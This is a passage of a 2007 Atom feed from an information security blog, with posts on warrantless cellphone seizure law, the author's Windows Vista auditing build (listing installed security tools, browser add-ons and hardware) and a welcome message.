href='http://www.blogger.com/feeds/6339171303043697983/posts/default/2504230459210607596'/><link rel='alternate' type='text/html' href='http://blog.ironguard.net/2007/06/backtrack-2-and-alfa-network-awus036h.html' title='Backtrack 2 and the Alfa Network AWUS036H'/><author><name>Anthony Williams</name><uri>http://www.blogger.com/profile/02720356501218887018</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_Z4u4MkgQQuE/RmkD7p8RM3I/AAAAAAAAAAM/JzMzq2P_Vro/s72-c/AWUS036H-70K.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6339171303043697983.post-8866010948765766588</id><published>2007-06-08T00:14:00.000-07:00</published><updated>2007-06-08T00:28:21.677-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='seizure'/><category scheme='http://www.blogger.com/atom/ns#' term='cell phone'/><category scheme='http://www.blogger.com/atom/ns#' term='warrantless'/><title type='text'>Warrantless cellphone seizure</title><content type='html'>&lt;p  style="margin-bottom: 0in;font-family:verdana;"&gt;&lt;span style="color: rgb(0, 0, 128);"&gt;&lt;span style="text-decoration: none;"&gt;To quickly summarize the article below deals with what constitutes warrant less seizure of a cell phone when a suspect is apprehended by law enforcement.    &lt;/span&gt;&lt;/span&gt; &lt;/p&gt;  &lt;p  style="margin-bottom: 0in;font-family:verdana;"&gt;&lt;span style="color: rgb(0, 0, 128);"&gt;&lt;u&gt;&lt;a href="http://articles.techrepublic.com.com/2100-1009_11-6187389.html?tag=nl.e118"&gt;http://articles.techrepublic.com.com/2100-1009_11-6187389.html?tag=nl.e118&lt;/a&gt;&lt;/u&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p  style="margin-bottom: 0in;font-family:verdana;"&gt;&lt;span style="color: rgb(0, 0, 128);"&gt;&lt;span style="text-decoration: none;"&gt;After reading the article several times I felt compelled to at least comment on its relevancy insofar as laws regarding the seizure of information and the devices it is stored upon emerge and evolve.&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p  style="margin-bottom: 0in;font-family:verdana;"&gt;&lt;span style="color: rgb(0, 0, 128);"&gt;&lt;span style="text-decoration: none;"&gt;Motion for exclusion of any evidence obtained from the cell phone in the above case in PDF format:&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p  style="margin-bottom: 0in;font-family:verdana;"&gt;&lt;span style="color: rgb(0, 0, 128);"&gt;&lt;u&gt;http://www.politechbot.com/docs/cell.phone.4a.brief.052907.pdf&lt;/u&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin-bottom: 0in; font-family: verdana;"&gt;This case has interesting ramifications as precedent is set.  As the lines between cellphones, PDAs and laptops continue to blur will warrants have to be issued where granularity and specificity become commonplace as to what can be searched and what is off limits?  If there is a shortcoming in the level of detail in the aforementioned warrant what valuable information inaccessible for building a case?&lt;/p&gt;  &lt;p style="margin-bottom: 0in;"&gt;&lt;span style="font-family:verdana;"&gt;What are your thoughts?&lt;/span&gt;  &lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6339171303043697983-8866010948765766588?l=blog.ironguard.net' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blog.ironguard.net/feeds/8866010948765766588/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6339171303043697983&amp;postID=8866010948765766588&amp;isPopup=true' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6339171303043697983/posts/default/8866010948765766588'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6339171303043697983/posts/default/8866010948765766588'/><link rel='alternate' type='text/html' href='http://blog.ironguard.net/2007/06/warrantless-cellphone-seizure.html' title='Warrantless cellphone seizure'/><author><name>Anthony Williams</name><uri>http://www.blogger.com/profile/02720356501218887018</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6339171303043697983.post-8197788951589463164</id><published>2007-05-26T14:41:00.000-07:00</published><updated>2007-05-29T03:38:59.007-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='tools'/><category scheme='http://www.blogger.com/atom/ns#' term='infosec'/><category scheme='http://www.blogger.com/atom/ns#' term='vista'/><category scheme='http://www.blogger.com/atom/ns#' term='audit'/><title type='text'>Windows Vista InfoSec Build</title><content type='html'>&lt;p  style="margin-bottom: 0in; color: rgb(0, 0, 0);font-family:verdana;" lang="en-US"&gt;&lt;span style="color: rgb(0, 0, 0);font-size:100%;" &gt;I recently installed Windows Vista Ultimate from scratch on one of my dual boot auditing laptops (Back|track 2 is on the second partition) and thought that I would share the experience for those considering the same endeavor.&lt;/span&gt;&lt;/p&gt;  &lt;p  style="margin-bottom: 0in; color: rgb(0, 0, 0);font-family:verdana;" lang="en-US"&gt;&lt;span style="color: rgb(0, 0, 0);font-size:100%;" &gt;I installed most popular infosec tools that I tend to use on a fairly regular basis when I'm on the Win32 platform (not very often).  I have also included the status of other complimentary and supplementary software and drivers that I installed:&lt;/span&gt;&lt;/p&gt;  &lt;p  style="margin-bottom: 0in; color: rgb(0, 0, 0);font-family:verdana;"&gt;&lt;span style="color: rgb(0, 0, 0);font-size:100%;" &gt;&lt;span lang="en-US"&gt;Amap, &lt;/span&gt;&lt;/span&gt;&lt;span style="color: rgb(0, 0, 0);font-size:100%;" &gt;&lt;span lang="en-US"&gt;Autoruns and Autorunsc, BrutusA2, Burpsuite, Cain &amp; Abel*, clamAV, Fgdump, Fport, Hydra, Ike-scan, Ipscan, John the Ripper, Metasploit Framework 3, Microsoft Baseline Security Analyzer 2.1, Nbtscan, Netcat, Nessj, NessusWX, Netstumbler, Ngrep, Ollydbg*, p0f, Paros Proxy, ProcessExplorer, PSTools Suite, Putty, Rainbowcrack, Snort, sguil-client 0.6.1, Spikeproxy, SuperScan4, Tcpview, Nessus 3.0.5 for win32, Wireshark*, Windump, Nmap 4.20, SQLRecon, SQLPing3, Suru, Winhex and Wikto&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p  style="margin-bottom: 0in; color: rgb(0, 0, 0);font-family:verdana;" lang="en-US"&gt;&lt;span style="color: rgb(0, 0, 0);font-size:100%;" &gt;All of the applications installed fairly painlessly to my surprise.&lt;/span&gt;&lt;/p&gt;  &lt;p  style="margin-bottom: 0in; color: rgb(0, 0, 0);font-family:verdana;" lang="en-US"&gt;&lt;span style="color: rgb(0, 0, 0);font-size:100%;" &gt;* Notes that the application in question had to be given Administrator privileges to function correctly in my environment.&lt;/span&gt;&lt;/p&gt;  &lt;p  style="margin-bottom: 0in; color: rgb(0, 0, 0);font-family:verdana;" lang="en-US"&gt;&lt;span style="color: rgb(0, 0, 0);font-size:100%;" &gt;Mozilla Firefox 2.0.0.3 with Add-ons (mostly for web application security):&lt;/span&gt;&lt;/p&gt;                &lt;p  style="margin-bottom: 0in; color: rgb(0, 0, 0);font-family:verdana;" lang="en-US"&gt;&lt;span style="color: rgb(0, 0, 0);font-size:100%;" &gt;Auto Copy, Fasterfox, Firebug, FireGPG, Header Spy, JSView, Live HTTP Headers, Server Spy, ShowIP, SwitchProxy Tool,&lt;br /&gt;Tamper Data, Torbutton, User Agent Switcher, View Source Chart, Web Developer&lt;/span&gt;&lt;/p&gt;  &lt;p  style="margin-bottom: 0in; color: rgb(0, 0, 0);font-family:verdana;" lang="en-US"&gt;&lt;span style="color: rgb(0, 0, 0);font-size:100%;" &gt;Print Drivers:&lt;/span&gt;&lt;/p&gt;  &lt;p  style="margin-bottom: 0in; color: rgb(0, 0, 0);font-family:verdana;" lang="en-US"&gt;&lt;span style="color: rgb(0, 0, 0);font-size:100%;" &gt;Epson Color Stylus 900N (Draft printer)  Detected and installed driver automagically.&lt;/span&gt;&lt;/p&gt; &lt;p  style="margin-bottom: 0in; color: rgb(0, 0, 0);font-family:verdana;" lang="en-US"&gt;&lt;span style="color: rgb(0, 0, 0);font-size:100%;" &gt;Lexmark Color Laser 530dn (Production printer) Manual driver and configuration required.&lt;/span&gt;&lt;/p&gt;  &lt;p  style="margin-bottom: 0in; color: rgb(0, 0, 0);font-family:verdana;" lang="en-US"&gt;&lt;span style="color: rgb(0, 0, 0);font-size:100%;" &gt;Hardware Devices:&lt;/span&gt;&lt;/p&gt; &lt;p  style="margin-bottom: 0in; color: rgb(0, 0, 0);font-family:verdana;" lang="en-US"&gt;&lt;span style="font-size:100%;"&gt;&lt;span style="color: rgb(0, 0, 153);"&gt;Supplementary Hardware:&lt;/span&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt; &lt;p  style="margin-bottom: 0in; color: rgb(0, 0, 0);font-family:verdana;" lang="en-US"&gt;&lt;span style="color: rgb(0, 0, 0);font-size:100%;" &gt;Logitech Quickcam for Notebooks Pro (Video conferencing)  Detected and installed driver automagically.&lt;/span&gt;&lt;/p&gt; &lt;p  style="margin-bottom: 0in; color: rgb(0, 0, 0);font-family:verdana;" lang="en-US"&gt;&lt;span style="color: rgb(0, 0, 0);font-size:100%;" &gt;Canon Powershot A560 (Incident and Physical Security photos)  Detected and installed driver automagically.&lt;/span&gt;&lt;/p&gt; &lt;p  style="margin-bottom: 0in; color: rgb(0, 0, 0);font-family:verdana;" lang="en-US"&gt;&lt;span style="font-size:100%;"&gt;&lt;span style="color: rgb(0, 0, 153);"&gt;Infosec Hardware:&lt;/span&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt; &lt;p  style="margin-bottom: 0in; color: rgb(0, 0, 0);font-family:verdana;" lang="en-US"&gt;&lt;span style="color: rgb(0, 0, 0);font-size:100%;" &gt;Alfa Network AWUS03H 802.11b/g  Detected and installed driver automagically.&lt;/span&gt;&lt;/p&gt; &lt;p  style="margin-bottom: 0in; color: rgb(0, 0, 0);font-family:verdana;" lang="en-US"&gt;&lt;span style="color: rgb(0, 0, 0);font-size:100%;" &gt;Ubiquiti SRC PCMCIA 802.11a/b/g  Detected and installed driver automagically.&lt;/span&gt;&lt;/p&gt;  &lt;p  style="margin-bottom: 0in; color: rgb(0, 0, 0);font-family:verdana;" lang="en-US"&gt;&lt;span style="color: rgb(0, 0, 0);font-size:100%;" &gt;Supplementary tools:&lt;/span&gt;&lt;/p&gt;               &lt;p  style="margin-bottom: 0in; color: rgb(0, 0, 0);font-family:verdana;" lang="en-US"&gt;&lt;span style="color: rgb(0, 0, 0);font-size:100%;" &gt;Winpcap 4.0, Stunnel, Sun Java JRE, Eclipse 3.2.2, Skype 3.2, Pidgin 2.0.1, OpenOffice 2.2, OpenVPN, Python 2.5.1, Ruby 1.8.6, Adobe Acrobat Reader 8, Adobe Flash Player 9, VMWare Player 2.0, WinPT, Truecrypt (when I'm not so angry I'll explain why not Bitlocker).&lt;/span&gt;&lt;/p&gt;  &lt;p  style="margin-bottom: 0in; color: rgb(0, 0, 0);font-family:verdana;" lang="en-US"&gt;&lt;span style="color: rgb(0, 0, 0);font-size:100%;" &gt;That's in in a nutshell.  I'm sure that I'll add more in upcoming days and if its anything worthwhile I will be sure to share.&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p  style="margin-bottom: 0in; color: rgb(0, 0, 0);font-family:verdana;" lang="en-US"&gt;&lt;span style="color: rgb(0, 0, 0);font-size:100%;" &gt;Until next time...May Your Skill Prevail.&lt;/span&gt;&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6339171303043697983-8197788951589463164?l=blog.ironguard.net' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blog.ironguard.net/feeds/8197788951589463164/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6339171303043697983&amp;postID=8197788951589463164&amp;isPopup=true' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6339171303043697983/posts/default/8197788951589463164'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6339171303043697983/posts/default/8197788951589463164'/><link rel='alternate' type='text/html' href='http://blog.ironguard.net/2007/05/windows-vista-infosec.html' title='Windows Vista InfoSec Build'/><author><name>Anthony Williams</name><uri>http://www.blogger.com/profile/02720356501218887018</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6339171303043697983.post-3943495673870284662</id><published>2007-05-25T16:42:00.000-07:00</published><updated>2007-05-26T15:34:33.618-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='information'/><category scheme='http://www.blogger.com/atom/ns#' term='security'/><category scheme='http://www.blogger.com/atom/ns#' term='welcome'/><title type='text'>Welcome!</title><content type='html'>&lt;style type="text/css"&gt;!--   @page { size: 8.5in 11in; margin: 0.79in }   P { margin-bottom: 0.08in }  --&gt;  &lt;/style&gt;  &lt;p  style="margin-bottom: 0in; font-family: verdana;font-family:verdana;"&gt;&lt;span style="font-size:100%;"&gt;Welcome to the IRON::Guard Security blog!  We plan on sharing various materials with you as time permits।  From book reviews to opinions on the Information Security trade and useful information obtained from our various experiences will be available here from time to time।  Thank you for stopping by and reading।  We will have more content posted here in the upcoming days, weeks, months and years।&lt;/span&gt;&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6339171303043697983-3943495673870284662?l=blog.ironguard.net' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blog.ironguard.net/feeds/3943495673870284662/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6339171303043697983&amp;postID=3943495673870284662&amp;isPopup=true' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6339171303043697983/posts/default/3943495673870284662'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6339171303043697983/posts/default/3943495673870284662'/><link rel='alternate' type='text/html' href='http://blog.ironguard.net/2007/05/welcome.html' title='Welcome!'/><author><name>IRON::Guard Security</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry></feed>
